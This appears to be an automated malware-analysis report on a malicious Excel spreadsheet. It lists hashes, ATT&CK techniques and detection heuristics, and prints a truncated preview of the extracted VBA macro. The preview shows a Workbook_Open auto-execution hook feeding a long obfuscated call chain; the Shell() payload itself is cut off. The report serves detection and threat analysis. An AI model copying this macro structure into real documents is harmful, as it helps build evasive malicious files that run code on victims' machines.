Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2c4e058a29c213c…

MALICIOUS

Office (OLE)

Size: 107.0 KB
Created: 2018-02-12 20:36:17
Authoring application: Microsoft Excel
First seen: 2018-09-04
MD5: b0ba1dbb9443f7c66a88792786ef18a9
SHA-1: d9c64b27aad84daf12114d8d0351297c01a2139b
SHA-256: f2c4e058a29c213c7283be382a2e0ad97d649d02275f3c53b67a99b262e48dd2
Risk Score: 228

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is an Excel document containing VBA macros, specifically a Workbook_Open event that triggers execution. The document body displays a fake error message in Turkish, prompting the user to enable macros. The VBA code includes a Shell() call, indicating it attempts to execute an external command or payload. The ClamAV detection name 'Xls.Malware.Valyria-10036513-0' further confirms its malicious nature.

Heuristics (6)

  • ClamAV: Xls.Malware.Valyria-10036513-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23665 bytes
SHA-256: 7ecb61dca434110f26ca8e0b4b90fc2925292cf346344a205440a76eddc07fe3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub woRKBoOK_OpEn(): Call XJEFH: End Sub
Sub XJEFH()
Call UOREJ
End Sub
Static Sub UOREJ()
Call RSFDM
End Sub
Static Function RSFDM() As Long
Call HMNUA
End Function
Function HMNUA() As Integer
Call EQATD
End Function
Static Function EQATD() As Boolean
Call UKJLR
End Function
Static Sub UKJLR()
Call SOWKU
End Sub
Static Sub SOWKU()
Call PSKJX
End Sub
Function PSKJX() As Single
Call FMSAK
End Function
Static Function FMSAK() As Double
Call CQFZN
End Function
Static Function CQFZN() As Variant
Call SKORB
End Function
Function SKORB() As Object
Call POBQE
End Function
Static Function POBQE() As Currency
Call MSPPH
End Function
Static Sub MSPPH()
Call DMXGV
End Sub
Static Sub DMXGV()
Call AQKFX
End Sub
Function AQKFX() As Boolean
Call QKTWL
End Function
Static Function QKTWL() As String
Call NOGWO
End Function
Static Function NOGWO()
Call KTUVR
End Function
Sub KTUVR()
Call ANCMF
End Sub
Sub ANCMF()
Call YRPLI
End Sub
Static Sub YRPLI()
Call OLYCW
End Sub
Static Sub OLYCW()
Call LPLCY
End Sub
Function LPLCY() As Currency
Call ITZBB
End Function
Static Function ITZBB() As Integer
Call YNHSP
End Function
Static Function YNHSP() As Date
Call VRURS
End Function
Sub VRURS()
Call MLDIG
End Sub
Sub MLDIG()
Call JPQIJ
End Sub
Static Sub JPQIJ()
Call ZJZZW
End Sub
Static Function ZJZZW() As Byte
Call WNMYZ
End Function
Function WNMYZ() As Long
Call TRZXC
End Function
Static Function TRZXC() As Single
Call JLIOQ
End Function
Static Sub JLIOQ()
Call GPVOT
End Sub
Static Sub GPVOT()
Call MCAER
End Sub
Static Function MCAER()
Call LVPYQ
End Function
Private Function LVPYQ() As Object
Call RYIZE
End Function
Static Function RYIZE() As Object
Call XBBBS
End Function
Static Function XBBBS() As Single
Call WTQUR
End Function
Private Function WTQUR() As Date
Call CWJVF
End Function
Static Function CWJVF() As Date
Call IZCXT
End Function
Static Function IZCXT() As Boolean
Call OCVYH
End Function
Private Function OCVYH() As Currency
Call NUKSG
End Function
Static Sub NUKSG()
Call TXDTU
End Sub
Static Sub TXDTU()
Call ZAWVI
End Sub
Private Function ZAWVI() As Long
Call JMNUO
End Function
Sub JMNUO()
Call ZKDEU
End Sub
Sub ZKDEU()
Call QIUOO
End Sub
Static Sub QIUOO()
Call FJTSN
End Sub
Static Sub FJTSN()
Call ULSWN
End Sub
Static Sub ULSWN()
Call JNRZM
End Sub
Private Function JNRZM() As Variant
Call RELVW
End Function
Private Function RELVW() As Long
Call FFLZV
End Function
Private Function FFLZV() As Byte
Call UHKCU
End Function
Private Function UHKCU() As Date
Call JJJGT
End Function
Private Function JJJGT() As Object
Call YKIKS
End Function
Private Function YKIKS() As Variant
Call NMHOR
End Function
Private Sub NMHOR()
Call VDBJB
End Sub
Private Sub VDBJB()
Call KFANA
End Sub
Private Sub KFANA()
Call ZGARA
End Sub
Private Sub ZGARA()
Call OIZUZ
End Sub
Private Sub OIZUZ()
Call DKYYY
End Sub
Private Sub DKYYY()
Call RLXCX
End Sub
Private Function RLXCX() As Currency
Call GNWFW
End Function
Private Function GNWFW() As Boolean
Call OEQBG
End Function
Private Function OEQBG() As Object
Call DGQFF
End Function
Static Function DGQFF() As Integer
Call SHPIE
End Function
Static Function SHPIE() As String
Call HJOMD
End Function
Static Function HJOMD() As Double
Call WLNQC
End Function
Static Sub WLNQC()
Call LMMTB
End Sub
Static Sub L
... (truncated)